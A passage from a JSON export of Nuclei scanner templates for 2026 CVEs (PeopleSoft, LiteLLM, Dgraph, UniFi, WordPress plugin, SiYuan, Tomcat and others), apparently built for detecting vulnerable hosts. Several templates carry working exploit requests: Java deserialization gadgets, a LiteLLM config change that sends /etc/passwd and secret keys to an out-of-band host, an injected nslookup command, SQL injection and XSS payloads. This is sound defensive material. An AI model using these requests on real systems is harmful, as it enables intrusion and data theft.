DhiyaneshDk\n  severity: critical\n  description: |\n    Oracle PeopleSoft PeopleTools 8.61 and 8.62 contain a remote code execution vulnerability in Updates Environment Management, letting unauthenticated network attackers fully compromise the system, exploit requires network access via HTTP.\n  impact: |\n    Unauthenticated attackers can fully compromise PeopleSoft Enterprise PeopleTools, leading to complete system takeover.\n  remediation: |\n    Update to the latest available version beyond 8.62.\n  reference:\n    - https://www.oracle.com/security-alerts/alert-cve-2026-35273.html\n    - https://cloud.google.com/blog/topics/threat-intelligence/shinyhunters-targets-education-sector-oracle-exploit\n    - https://www.rapid7.com/blog/post/etr-active-exploitation-of-oracle-peoplesoft-zero-day-cve-2026-35273/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-35273\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-35273\n    epss-score: 0.95473\n    epss-percentile: 0.99869\n    cwe-id: CWE-502\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: oracle\n    product: peoplesoft_enterprise_peopletools\n    shodan-query: http.html:\"PeopleSoft\"\n    fofa-query: body=\"PeopleSoft Environment Management Hub\"\n  tags: cve,cve2026,oracle,peoplesoft,deserialization,rce,kev,oast,vkev\n\nhttp:\n  - raw:\n      - |\n        POST /PSEMHUB/hub HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        OPERATION={{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains(body, 'rO0ABX')\"\n          - \"contains(interactsh_protocol, 'dns')\"\n        condition: and\n# digest: 490a0046304402207d315dd68f35151080886f9d8743ba2c3cdfbbf2603d55c79ea5e544be972aa2022027e8fe6a5ed32728b6bc168d3ef7d94bd033a3589e03ab4b73d2c5be98781d7b:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-35273.yaml","vuln_id":"cve-2026-35273"},{"raw":"id: CVE-2026-35037\n\ninfo:\n  name: Ech0 < 4.2.8 - Server-Side Request Forgery\n  author: fineman999\n  severity: high\n  description: |\n    Ech0 before 4.2.8 exposes an unauthenticated SSRF vulnerability in GET /api/website/title. The website_url query parameter is fetched server-side without validating the target host or IP address.\n  reference:\n    - https://github.com/lin-snow/Ech0/security/advisories/GHSA-cqgf-f4x7-g6wc\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-35037\n  classification:\n    cve-id: CVE-2026-35037\n    epss-score: 0.00618\n    epss-percentile: 0.48247\n    cwe-id: CWE-918\n    cvss-score: 7.2\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N\n  metadata:\n    verified: true\n    vendor: lin-snow\n    product: ech0\n    max-request: 1\n    shodan-query: title:\"Ech0\"\n    fofa-query: title:\"Ech0\"\n  tags: cve,cve2026,ech0,ssrf,oast,oss\n\nhttp:\n  - raw:\n      - |\n        GET /api/website/title?website_url=http://{{interactsh-url}}/ HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 400'\n          - 'contains(body, \"data\\\":\")'\n          - 'contains(interactsh_protocol, \"http\")'\n          - 'contains(content_type, \"application/json\")'\n        condition: and\n# digest: 490a00463044022013887dbb4c81be4bc1422e5526e0bd220906edcf8005d01f6b7e344577c175420220616c2bcd2a38a771f06dd57bda59821a34057ee06d28fbfccce1bc86afd322fe:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-35037.yaml","vuln_id":"cve-2026-35037"},{"raw":"id: CVE-2026-35029\n\ninfo:\n  name: LiteLLM - Arbitrary File Read\n  author: theamanrawat\n  severity: high\n  description: |\n    LiteLLM < 1.83.0 contains a broken access control vulnerability caused by lack of admin role enforcement on /config/update endpoint, letting authenticated users modify configurations, execute code, read files, and take over accounts.\n  impact: |\n    Authenticated users can execute arbitrary code, read server files, and take over privileged accounts, leading to full system compromise.\n  remediation: |\n    Update to version 1.83.0 or later.\n  reference:\n    - https://github.com/BerriAI/litellm\n    - https://sec-consult.com/vulnerability-lab/advisory/broken-access-control-in-config-endpoint-in-litellm/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-35029\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2026-35029\n    epss-score: 0.30374\n    epss-percentile: 0.98149\n    cwe-id: CWE-863\n  metadata:\n    max-request: 4\n    verified: true\n    vendor: berriai\n    product: litellm\n  tags: cve,cve2026,litellm,file-read,oob,oidc,oast,vuln,authenticated,vkev\n\nhttp:\n  - raw:\n      - |\n        POST /config/update HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Bearer {{userkey}}\n        Content-Type: application/json\n\n        {\"environment_variables\":{\"FILE_TO_READ\":\"/etc/passwd\",\"EXFIL_PREFIX\":\"EXFIL\"},\"general_settings\":{\"pass_through_endpoints\":[{\"path\":\"/exfil-{{randstr}}\",\"target\":\"https://{{interactsh-url}}\",\"headers\":{\"LANGFUSE_PUBLIC_KEY\":\"os.environ/EXFIL_PREFIX\",\"LANGFUSE_SECRET_KEY\":\"os.environ/oidc/env_path/FILE_TO_READ\",\"X-DB-URL\":\"os.environ/DATABASE_URL\",\"X-Master-Key\":\"os.environ/LITELLM_MASTER_KEY\"}}]}}\n\n      - |\n        GET /health/liveliness HTTP/1.1\n        Host: {{Hostname}}\n\n      - |\n        GET /exfil-{{randstr}} HTTP/1.1\n        Host: {{Hostname}}\n\n    extractors:\n      - type: regex\n        part: interactsh_request\n        name: content\n        group: 1\n        regex:\n          - \"Authorization:\\\\s*Basic\\\\s+([A-Za-z0-9+/=]+)\"\n        internal: true\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(interactsh_protocol, \"http\")'\n          - 'regex(\"EXFIL:root:.*:0:0:\", base64_decode(content))'\n        condition: and\n# digest: 490a00463044022012246c69dd9e7f3b5384f265fb01f01aaa2f96cbe711b51bbd916e2d6da7375602200b7fe915163251f0fe0d801ab82ee7cb50f7d7238ebada217f81b0ee15e9e15a:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-35029.yaml","vuln_id":"cve-2026-35029"},{"raw":"id: CVE-2026-34976\n\ninfo:\n  name: Dgraph <=v25.3.0 - Admin Mutation Missing Authorization\n  author: str4k3r\n  severity: critical\n  description: |\n    Dgraph <=v25.3.0 contains an authentication bypass caused by missing authorization middleware for the restoreTenant admin mutation, letting unauthenticated attackers overwrite the database, read files, and perform SSRF, exploit requires no authentication.\n  impact: |\n    Unauthenticated attackers can overwrite the database, read server files, and perform SSRF, leading to full data compromise and server access.\n  remediation: |\n    Update to version 25.3.1 or later.\n  reference:\n    - https://github.com/hypermodeinc/dgraph/security/advisories/GHSA-p5rh-vmhp-gvcw\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-34976\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 10.0\n    cve-id: CVE-2026-34976\n    epss-score: 0.02036\n    epss-percentile: 0.80234\n    cwe-id: CWE-862\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: hypermodeinc\n    product: dgraph\n    shodan-query: title:\"Dgraph\"\n    fofa-query: body=\"dgraph\"\n  tags: cve,cve2026,dgraph,auth-bypass,ssrf\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    host-redirects: true\n    max-redirects: 3\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_any(body, \"dgraph\", \"Dgraph\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /admin HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"query\": \"mutation { restore(input: { location: \\\"file:///nonexistent-cve-34976-probe/\\\" }) { code message } }\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"unauthorized ip address\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /admin HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"query\": \"mutation { restoreTenant(input: { restoreInput: { location: \\\"file:///nonexistent-cve-34976-probe/\\\" }, fromNamespace: 0 }) { code message } }\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"restoreTenant\")'\n          - '!contains(body, \"unauthorized ip address\")'\n        condition: and\n# digest: 4a0a004730450221009cd9dbb28c27ea598818e7d4b5ed7d7a955d416884545dbca9bf3b310622324002200a472037dd8fc30b4b848650dac56e40290eb32cee32c18f6ec3353a7ecd0573:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-34976.yaml","vuln_id":"cve-2026-34976"},{"raw":"id: CVE-2026-34910\n\ninfo:\n  name: UniFi OS Server - Command Injection\n  author: Kazgangap\n  severity: critical\n  description: |\n    A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection.\n  impact: |\n    Network attackers can execute arbitrary commands, potentially leading to full system compromise.\n  remediation: |\n    Update to the latest version of UniFi OS.\n  reference:\n    - https://bishopfox.com/blog/popping-root-on-unifi-os-server-unauthenticated-rce-chain-detection-analysis\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-34910\n    - https://community.ui.com/releases/Security-Advisory-Bulletin-064-064/84811c09-4cf4-42ab-bd61-cc994445963b\n    - https://www.it-connect.tech/critical-3-exploit-chain-grants-root-access-on-unifi-os-server/\n  classification:\n    cve-id: CVE-2026-34910\n    epss-score: 0.87468\n    epss-percentile: 0.99749\n    cvss-score: 10.0\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: html:\"UniFi OS\"\n  tags: cve,cve2026,unifi,rce,vkev,kev\n\nhttp:\n  - raw:\n      - |\n        GET /api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package?pkg_name=%3b+nslookup+{{interactsh-url}}+%3b HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_any(body , \"CODE_SYSTEM_ERROR\", \"System failure\")'\n          - 'contains(interactsh_protocol, \"dns\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4b0a00483046022100e958d53dc0b36ca05ecf31072a3b89316ab9ede18d86e816a18bbb41e6be83d602210089fd12891862068856c2748fe50b369fd4d6feabc035afccd0b1a74aa419c9a5:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-34910.yaml","vuln_id":"cve-2026-34910"},{"raw":"id: CVE-2026-34908\n\ninfo:\n  name: UniFi OS - Authentication Bypass via Path Traversal (..%2f)\n  author: Boreas37\n  severity: critical\n  description: |\n    UniFi OS devices contain an improper access control vulnerability caused by insufficient authorization checks, letting network attackers make unauthorized system changes, exploit requires network access.\n  impact: |\n    Attackers can make unauthorized changes to the system, potentially compromising device integrity and security.\n  remediation: |\n    Update to the latest version of UniFi OS.\n  reference:\n    - https://community.ui.com/releases/Security-Advisory-Bulletin-064-064/84811c09-4cf4-42ab-bd61-cc994445963b\n    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-34908\n    - https://bishopfox.com/blog/popping-root-on-unifi-os-server-unauthenticated-rce-chain-detection-analysis\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-34908\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 10.0\n    cve-id: CVE-2026-34908\n    epss-score: 0.85194\n    epss-percentile: 0.99704\n    cwe-id: CWE-284\n  metadata:\n    max-request: 3\n    verified: true\n    shodan-query: 'http.title:\"UniFi OS\"'\n    fofa-query: 'title=\"UniFi OS\"'\n  tags: cve,cve2026,unifi,ubiquiti,auth-bypass,traversal,kev,unauth,vkev\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    host-redirects: true\n    max-redirects: 2\n    matchers:\n      - type: dsl\n        dsl:\n          - \"contains_any(to_lower(body), 'unifi', 'ubiquiti', 'ubnt')\"\n        internal: true\n\n  - raw:\n      - |\n        GET /proxy/users/api/v2/ucs/update/latest_package HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 401 || status_code == 403\"\n        internal: true\n\n  - raw:\n      - |\n        GET /api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains_all(body, 'pkg_name required', 'CODE_SYSTEM_ERROR')\"\n        condition: and\n# digest: 4a0a00473045022005ce3ed69367e44dcbbf2f627aef72d05c72d1c5c3a189b288add45ffd91f7c6022100948748018874e119479231307b6558d6e040e8e97a4ee223804a6326af194663:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-34908.yaml","vuln_id":"cve-2026-34908"},{"raw":"id: CVE-2026-34885\n\ninfo:\n  name: WordPress Media Library Assistant <= 3.34 - SQL Injection\n  author: theamanrawat\n  severity: high\n  description: |\n    David Lingren Media Library Assistant <= 3.34 contains an sql injection caused by improper neutralization of special elements in SQL commands, letting attackers execute arbitrary SQL queries, exploit requires crafted input.\n  impact: |\n    Attackers can execute arbitrary SQL commands, potentially leading to data disclosure, modification, or deletion.\n  remediation: |\n    Update to the latest version beyond 3.34.\n  reference:\n    - https://patchstack.com/database/vulnerability/wordpress-media-library-assistant-plugin-3-34-sql-injection-vulnerability\n    - https://plugins.svn.wordpress.org/media-library-assistant/tags/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-34885\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L\n    cvss-score: 8.5\n    cve-id: CVE-2026-34885\n    epss-score: 0.01668\n    epss-percentile: 0.75734\n    cwe-id: CWE-89\n  metadata:\n    max-request: 5\n    verified: true\n    shodan-query: http.html:\"/wp-content/plugins/media-library-assistant/\"\n    fofa-query: body=\"/wp-content/plugins/media-library-assistant/\"\n  tags: cve,cve2026,wp,wordpress,wp-plugin,sqli,media-library-assistant,authenticated\n\nvariables:\n  num: \"999999999\"\n\nflow: http(1) && http(2) && http(3) && http(4)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/media-library-assistant/readme.txt\"\n\n    matchers:\n      - type: word\n        words:\n          - \"Media Library Assistant\"\n          - \"Stable tag:\"\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-login.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=\n\n    matchers:\n      - type: dsl\n        dsl:\n          - contains(header, \"wordpress_logged_in\")\n        internal: true\n\n  - raw:\n      - |\n        GET /wp-admin/admin-ajax.php?action=rest-nonce HTTP/1.1\n        Host: {{Hostname}}\n\n    extractors:\n      - type: regex\n        name: nonce\n        part: body\n        group: 0\n        regex:\n          - \"^[a-f0-9]{10}$\"\n        internal: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-json/wp/v2/posts HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        X-WP-Nonce: {{nonce}}\n\n        {\"title\":\"{{rand_text_alpha(10)}}\",\"content\":\"[mla_custom_list meta_key=\\\"_wp_attached_file\\\" fields=\\\"(SELECT CONCAT(0x7170787871,md5({{num}}),0x7171787171)) AS meta_value\\\" no_count=\\\"true\\\"]\",\"status\":\"draft\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 201'\n          - 'contains_all(body, \"{{md5(num)}}\", \"content\", \"rendered\")'\n        condition: and\n# digest: 4a0a00473045022100cce82e0f7207ad80250aa5f48de1113971d019c88b771a09bca057a0cddfe8e90220347d6a313d777d4e3249013794fb371a4f22abf37e0d05da8ad81f324e0bfcaa:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-34885.yaml","vuln_id":"cve-2026-34885"},{"raw":"id: CVE-2026-34847\n\ninfo:\n  name: Hoppscotch <= 2026.2.1 - Open Redirect\n  author: ritikchaddha\n  severity: medium\n  description: |\n    Hoppscotch <= 2026.2.1 is vulnerable to a DOM-based open redirect on the /enter page. The redirect query parameter is passed directly to windowz location.href with no origin validation. Requires one additional query parameter to trigger. Exploited via a crafted URL such as /enter?redirect=evil.com&foo=bar.\n  impact: |\n    Phishing, credential theft, and OAuth token interception. Victims who click a crafted link see the legitimate Hoppscotch domain in the address bar before being silently redirected to an attacker-controlled site.\n  remediation: |\n    Upgrade to Hoppscotch 2026.3.0 or later. The fix validates that the redirect URL is same-origin before performing the navigation.\n  reference:\n    - https://github.com/hoppscotch/hoppscotch/security/advisories/GHSA-27pm-c9ch-746q\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-34847\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N\n    cvss-score: 4.7\n    cve-id: CVE-2026-34847\n    epss-score: 0.00401\n    epss-percentile: 0.34203\n    cwe-id: CWE-601\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: hoppscotch\n    product: hoppscotch\n    shodan-query: http.title:\"Hoppscotch\"\n    fofa-query: title=\"Hoppscotch\"\n  tags: cve,cve2026,hoppscotch,redirect\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/enter?redirect=oast.me&foo=bar\"\n\n    matchers:\n      - type: regex\n        part: header\n        regex:\n          - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$'\n# digest: 4b0a004830460221009c56629480b0f9b040332be9c7da035509f911952d7dfd9561b3aa9c8dc99b0f022100e85691a6c22c3ee900bf473dcffd832c2c7750164b6a4bcf331956d95159d0e1:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-34847.yaml","vuln_id":"cve-2026-34847"},{"raw":"id: CVE-2026-34605\n\ninfo:\n  name: SiYuan Note - Cross-Site Scripting\n  author: ritikchaddha\n  severity: medium\n  description: |\n    SiYuan Note through version 3.6.1 is vulnerable to unauthenticated reflected Cross-Site Scripting (XSS) in the `/api/icon/getDynamicIcon` endpoint due to improper filtering of SVG elements with a namespace prefix (such as `<x:script>`). By using a namespaced script element, attackers can bypass the `SanitizeSVG` function and execute arbitrary JavaScript in the victim’s browser upon visiting a crafted link.\n  remediation: |\n    Upgrade to SiYuan Note version 3.6.2 or later, where the namespace prefix is stripped prior to sanitization, blocking this form of XSS.\n  impact: |\n    Exploitation allows attackers to execute JavaScript in the context of the SiYuan Note instance, enabling unauthorized access to sensitive data, API calls with the victim's privileges, and potential data extraction or modification, if the victim is an authenticated user.\n  reference:\n    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-73g7-86qr-jrg3\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-34605\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2026-34605\n    epss-score: 0.00469\n    epss-percentile: 0.39774\n    cwe-id: CWE-79\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: siyuan-note\n    product: siyuan\n    shodan-query: http.favicon.hash:-1450125239\n  tags: cve,cve2026,siyuan,xss,svg\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/icon/getDynamicIcon?type=8&color=red&content=%3C%2Ftext%3E%3Cx%3Ascript%20xmlns%3Ax%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3Ealert%28document.domain%29%3C%2Fx%3Ascript%3E%3Ctext%3E\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '</text><x:script xmlns:x=\"http://www.w3.org/2000/svg\">alert(document.domain)</x:script><text>'\n          - 'id=\"dynamic_icon_type8'\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - \"image/svg+xml\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100b067b39c62f4c8ed56bd8bf33f78fc88d43366765f9e06a351bf01b355783e25022100ae7223e1986107f16ffb2ed6f10fe45e5648db2b706ebf084d3117dfa6644154:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-34605.yaml","vuln_id":"cve-2026-34605"},{"raw":"id: CVE-2026-34486\n\ninfo:\n  name: Apache Tomcat Tribes EncryptInterceptor Bypass - Remote Code Execution\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    Missing Encryption of Sensitive Data vulnerability in Apache Tomcat due to the fix for CVE-2026-29146 allowing the bypass of the EncryptInterceptor. This issue affects Apache Tomcat: 11.0.20, 10.1.53, 9.0.116.\n  impact: |\n    An unauthenticated attacker can achieve remote code execution by sending an unencrypted serialized Java object to the Tribes cluster receiver port.\n  remediation: |\n    Users are recommended to upgrade to version 11.0.21, 10.1.54 or 9.0.117, which fix the issue.\n  reference:\n    - https://striga.ai/research/tomcat-tribes-unauth-rce\n    - https://github.com/striga-ai/CVE-2026-34486\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-34486\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-34486\n    epss-score: 0.98616\n    epss-percentile: 0.99923\n    cwe-id: CWE-502\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: apache\n    product: tomcat\n    shodan-query: product:\"Apache Tomcat Tribes\"\n  tags: cve,cve2026,network,apache,tomcat,rce,deserialization,oast,oob,vkev,kev\n\njavascript:\n  - pre-condition: |\n      isPortOpen(Host, Port)\n\n    code: |\n      const net = require('nuclei/net');\n\n      const address = Host + ':' + Port;\n      const hostname = interactsh_url;\n\n      const GADGET_PREFIX = 'aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff';\n      const GADGET_SUFFIX = '74000071007e0005740004687474707078740003706f6378';\n\n      let hostnameHex = '';\n      for (let i = 0; i < hostname.length; i++) {\n        hostnameHex += hostname.charCodeAt(i).toString(16).padStart(2, '0');\n      }\n\n      const lenHex = hostname.length.toString(16).padStart(4, '0');\n      const gadgetHex = GADGET_PREFIX + '74' + lenHex + hostnameHex + GADGET_SUFFIX;\n      const gadgetByteLen = gadgetHex.length / 2;\n\n      const MEMBER_HEX = '5452494245532d42'       // \"TRIBES-B\"\n        + '01'                                      // version\n        + '00'                                      // padding\n        + '00000035'                                // body length (53)\n        + '000000e8d4a51000'                        // memberAliveTime\n        + '00000fa1'                                // tcpListenPort (4001)\n        + '00000000'                                // udpListenPort\n        + '00000000'                                // securePort\n        + '04'                                      // host length\n        + '7f000001'                                // 127.0.0.1\n        + '00000000'                                // commandLength\n        + '00000000'                                // domainLength\n        + '01010101010101010101010101010101'        // uniqueId (16 bytes)\n        + '00000000'                                // payloadLength\n        + '5452494245532d45'                        // \"TRIBES-E\"\n        + '01'                                      // version\n        + '00';                                     // padding\n\n      const OPTIONS = '00000000';\n      const TIMESTAMP = '000000e8d4a51000';\n      const UID_LEN = '00000010';\n      const UID = 'dddddddddddddddddddddddddddddddd';\n      const MEMBER_LEN = '0000004d';\n\n      const serializedLenHex = gadgetByteLen.toString(16).padStart(8, '0');\n\n      const channelData = OPTIONS + TIMESTAMP + UID_LEN + UID + MEMBER_LEN + MEMBER_HEX\n        + serializedLenHex + gadgetHex;\n\n      const channelDataByteLen = channelData.length / 2;\n      const outerLenHex = channelDataByteLen.toString(16).padStart(8, '0');\n\n      const FLT2002 = '464c5432303032';\n      const TLF2003 = '544c4632303033';\n      const packet = FLT2002 + outerLenHex + channelData + TLF2003;\n\n      let conn;\n      try {\n        conn = net.Open('tcp', address);\n        conn.SendHex(packet);\n        conn.RecvString(10);\n      } catch (e) {}\n\n      if (conn) conn.Close();\n\n      Export('payload_sent');\n\n    args:\n      Host: \"{{Host}}\"\n      Port: \"4000\"\n      interactsh_url: \"{{interactsh-url}}\"\n\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"dns\"\n# digest: 4b0a004830460221008be7405066487536ceb264a570581a9feed405c357804cd877635e921c6660fc022100fa818fe7ba61737745b6da62d8eff950098d9e222e9f5a8f14ecdcd3edd917ba:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-34486.yaml","vuln_id":"cve-2026-34486"},{"raw":"id: CVE-2026-34453\n\ninfo:\n  name: SiYuan <= v3.6.1 - Bookmark Data Disclosure\n  author: 0x_Akoko\n  severity: high\n  description: |\n   SiYuan v3.6.2 contains an information disclosure vulnerability caused by improper authorization checks in the publish service's bookmark filtering, letting unauthenticated visitors access bookmarked blocks from password-protected documents, exploit requires access to the publish service.\n  impact: |\n   Unauthenticated attackers can access content from protected documents without a password, exposing sensitive information\n  remediation: |\n   Update to version 3.6.2 or later.\n  reference:\n    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-c77m-r996-jr3q\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-34453\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-34453\n    epss-score: 0.01227\n    epss-percentile: 0.67538\n    cwe-id: CWE-863\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: siyuan-note\n    product: siyuan\n    shodan-query: http.favicon.hash:-1450125239\n  tags: cve,cve2026,siyuan,unauth,disclosure,bac\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: POST\n    path:\n      - \"{{BaseURL}}/api/system/version\"\n\n    matchers:\n      - type: dsl\n        internal: true\n        dsl:\n          - 'status_code == 200'\n          - 'compare_versions(ver, \">= 0.0.1\", \"<= 3.6.1\")'\n        condition: and\n\n    extractors:\n      - type: json\n        name: ver\n        internal: true\n        json:\n          - '.data'\n\n  - raw:\n      - |\n        POST /api/bookmark/getBookmark HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"code\":0'\n          - '\"type\":\"bookmark\"'\n          - '\"blocks\"'\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - \"application/json\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100b8efdf2321ea4fedde935dd00e2306309e80c7ca3c1a39aca820c66eb136b02802210097c9a8d3a2576a5418ce297a80b91b7359e49a07fbb79b4a3b07ea04ea2c5843:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-34453.yaml","vuln_id":"cve-2026-34453"},{"raw":"id: CVE-2026-34413\n\ninfo:\n  name: Xerte Online Toolkits <= 3.15 - Remote Code Execution\n  author: Aryu-RU\n  severity: critical\n  description: |\n    Xerte Online Toolkits versions 3.15 and earlier expose the elFinder file manager connector at /editor/elfinder/php/connector.php without authentication (CVE-2026-34413), because the access-control redirect for unauthenticated users does not call exit()/die() and execution continues server-side. This is chained with a relative path traversal in the elFinder rename command (CVE-2026-34414) and an incomplete file-extension blocklist that still permits .php4 (CVE-2026-34415) to write an attacker-controlled PHP file into the application root, resulting in unauthenticated remote code execution.\n  impact: |\n    An unauthenticated attacker can execute arbitrary PHP code on the server hosting Xerte Online Toolkits.\n  remediation: |\n    Update to a fixed release. The fix, which adds exit() after the access-control redirect and sanitizes elFinder file names, was backported to the 3.13, 3.14 and 3.15 branches.\n  reference:\n    - https://www.vulncheck.com/advisories/xerte-online-toolkits-missing-authentication-via-connector-php\n    - https://github.com/bootstrapbool/xerteonlinetoolkits-rce\n    - https://github.com/thexerteproject/xerteonlinetoolkits/issues/1527\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-34413\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-34414\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-34415\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-34413\n    epss-score: 0.0311\n    epss-percentile: 0.87211\n    cwe-id: CWE-306\n  metadata:\n    verified: true\n    vendor: xerte\n    product: xerte_online_toolkits\n    shodan-query: http.title:\"Xerte Online Toolkits\"\n    fofa-query: title=\"Xerte Online Toolkits\"\n  tags: 